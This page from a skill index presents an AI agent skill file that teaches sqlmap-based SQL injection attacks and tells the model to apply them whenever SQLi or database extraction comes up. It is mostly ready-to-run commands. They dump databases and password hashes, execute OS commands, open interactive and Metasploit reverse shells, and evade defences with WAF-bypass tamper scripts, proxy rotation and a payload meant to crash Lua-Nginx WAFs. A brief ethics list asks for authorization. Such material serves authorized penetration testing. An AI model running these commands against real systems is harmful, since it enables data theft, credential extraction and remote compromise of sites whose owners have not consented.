OpenSkillIndex← back to search

Hacktricks-skills sqlmap-pentest

SQL injection testing with sqlmap. Use this skill whenever the user needs to test for SQL injection vulnerabilities, enumerate databases, extract data from vulnerable applications, or bypass WAFs with sqlmap. Trigger on any mention of SQL injection testing, sqlmap commands, database enumeration, WAF bypass, or web application security testing involving SQL. Don't wait for explicit "use sqlmap" - if they're testing SQLi or need database extraction, this skill applies.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/sqlmap/SKILL.MD
source content

SQLMap Pentesting Skill

This skill helps you conduct SQL injection testing using sqlmap, from basic reconnaissance to advanced WAF bypass techniques.

Quick Start

Basic SQLMap Command Structure

sqlmap -u "<URL>" -p "<PARAMETER>" [OPTIONS]

Essential Flags for Most Tests

-u "<URL>"                    # Target URL
-p "<PARAM>"                  # Parameter to test
--random-agent                # Rotate user agents
--threads=10                  # Parallel requests
--risk=3                      # Aggressive testing (1-5)
--level=5                     # Maximum detection (1-5)
--batch                       # Non-interactive mode
--technique="BEUSTQ"          # All injection techniques

Injection Techniques

Use 

--technique
to specify which SQL injection methods to attempt:

TechniqueFlagWhen to Use
Boolean-based blindBTrue/false conditions reveal data
Error-basedEVerbose DBMS error messages
UNION queryUUNION SELECT statements
Stacked queriesSMultiple statements with semicolons
Time-based blindTSLEEP/WAITFOR delays
Out-of-bandQDNS callbacks, LOAD_FILE()

Default order: 

BEUSTQ

Example - Test only Boolean and Time-based:

sqlmap -u "http://target/?id=1" --technique="BT" --batch

Target Injection Points

URL Parameters (GET)

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id  # Auto-detect injection point

POST Data

sqlmap -u "http://example.com" --data "username=*&password=*"

HTTP Headers

# Cookie injection
sqlmap -u "http://example.com" --cookie "mycookies=*"

# Header injection
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

From Burp/ZAP Capture

# Save request to req.txt, then:
sqlmap -r req.txt --current-user

Second-Order Injection

sqlmap -r request.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3

Database Enumeration

Internal Information

--current-user      # Current database user
--is-dba            # Check if user is admin
--hostname          # Server hostname
--users             # List database users
--passwords         # Extract user passwords

Database Data Extraction

--all               # Retrieve everything
--dbs               # List all databases
--tables            # List tables in database (-D <DB_NAME>)
--columns           # List columns in table (-D <DB> -T <TABLE>)
--dump              # Dump table contents

Example - Full enumeration:

sqlmap -u "http://target/?id=1" -p id --dbs --batch
sqlmap -u "http://target/?id=1" -p id -D "database_name" --tables --batch
sqlmap -u "http://target/?id=1" -p id -D "database_name" -T "users" --dump --batch

OS Command Execution

# Execute single command
sqlmap -u "http://target/?id=1" -p id --os-cmd "whoami"

# Interactive shell
sqlmap -u "http://target/?id=1" -p id --os-shell

# Drop reverse shell (requires Metasploit)
sqlmap -u "http://target/?id=1" -p id --os-pwn

WAF Bypass Techniques

Tamper Scripts

Use 

--tamper
to bypass WAFs and filters. Common options:

TamperUse Case
apostrophemask.py
Bypass quote filtering
base64encode.py
Encode entire payload
chardoubleencode.py
Double URL-encode
space2comment.py
Replace spaces with comments
randomcase.py
Randomize keyword case
unionalltounion.py
UNION ALL → UNION
versionedkeywords.py
MySQL versioned comments
luanginxmore.py
Crash Lua-Nginx WAFs (POST only)

Example - Multiple tampers:

sqlmap -u "http://target/?id=1" -p id --tamper=apostrophemask.py,randomcase.py --batch

Example - Lua-Nginx WAF bypass:

sqlmap --method=POST -u "http://target" --data "id=*" --tamper=luanginxmore.py --batch

Custom Prefix/Suffix

# Add suffix to injection
sqlmap -u "http://target/?id=1" -p id --suffix="-- "

# Add prefix to injection
sqlmap -u "http://target/?id=1" -p id --prefix="') "

Boolean Blind Helper

# Find strings that don't appear in true responses
sqlmap -r request.txt -p id --not-string "ridiculous" --batch

Advanced Features

HTTP/2 Support (sqlmap >= 1.9.x)

# Force HTTP/2 (bypasses HTTP/1.1 rate limiting)
sqlmap -u "https://target" --http2 --force-ssl

Proxy Rotation

# Rotate proxies every 3 requests
sqlmap -u "http://target" --proxy-file proxies.txt --proxy-freq 3

Mobile User-Agent

# Spoof mobile client (some APIs expose more data)
sqlmap -u "http://target" --mobile

Offline Mode

# Reuse cached data without network traffic
sqlmap -u "http://target" --offline

# Purge session data when done
sqlmap -u "http://target" --purge

Website Crawling

# Auto-discover and test all endpoints
sqlmap -u "http://target/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

Authentication Support

# HTTP Basic Auth
sqlmap -u "http://target" --auth-type="Basic" --auth-cred="user:pass"

# HTTP Digest Auth
sqlmap -u "http://target" --auth-type="Digest" --auth-cred="user:pass"

# NTLM Auth
sqlmap -u "http://target" --auth-type="NTLM" --auth-cred="domain/user:pass"

Common Attack Scenarios

Scenario 1: Quick Vulnerability Check

sqlmap -u "http://target/?id=1" -p id --batch --random-agent --threads=10

Scenario 2: Full Database Extraction

sqlmap -u "http://target/?id=1" -p id --dbs --batch
sqlmap -u "http://target/?id=1" -p id -D "<db_name>" --tables --batch
sqlmap -u "http://target/?id=1" -p id -D "<db_name>" -T "<table_name>" --dump --batch

Scenario 3: WAF-Bypassed Enumeration

sqlmap -u "http://target/?id=1" -p id --tamper=apostrophemask.py,randomcase.py --level=5 --risk=3 --batch

Scenario 4: POST Request Testing

sqlmap -u "http://target/login" --data "username=*&password=*" --batch

Scenario 5: Header Injection

sqlmap -u "http://target" --headers="X-Forwarded-For:*" --batch

Safety and Ethics

  • Only test systems you have authorization to test
  • Use 
    --risk=1
    and 
    --level=1
    for initial reconnaissance
  • Higher risk/level values can cause database instability
  • Use 
    --purge
    to clean up session data after testing
  • Document all findings for responsible disclosure

Troubleshooting

Slow Performance

  • Reduce 
    --threads
    value
  • Lower 
    --level
    and 
    --risk
  • Use 
    --batch
    to skip interactive prompts

False Positives

  • Verify with manual testing
  • Use 
    --technique
    to limit to specific methods
  • Check with 
    --not-string
    for boolean blind

WAF Blocking

  • Try different tamper scripts
  • Use proxy rotation
  • Lower request rate with fewer threads
  • Try HTTP/2 with 
    --http2

References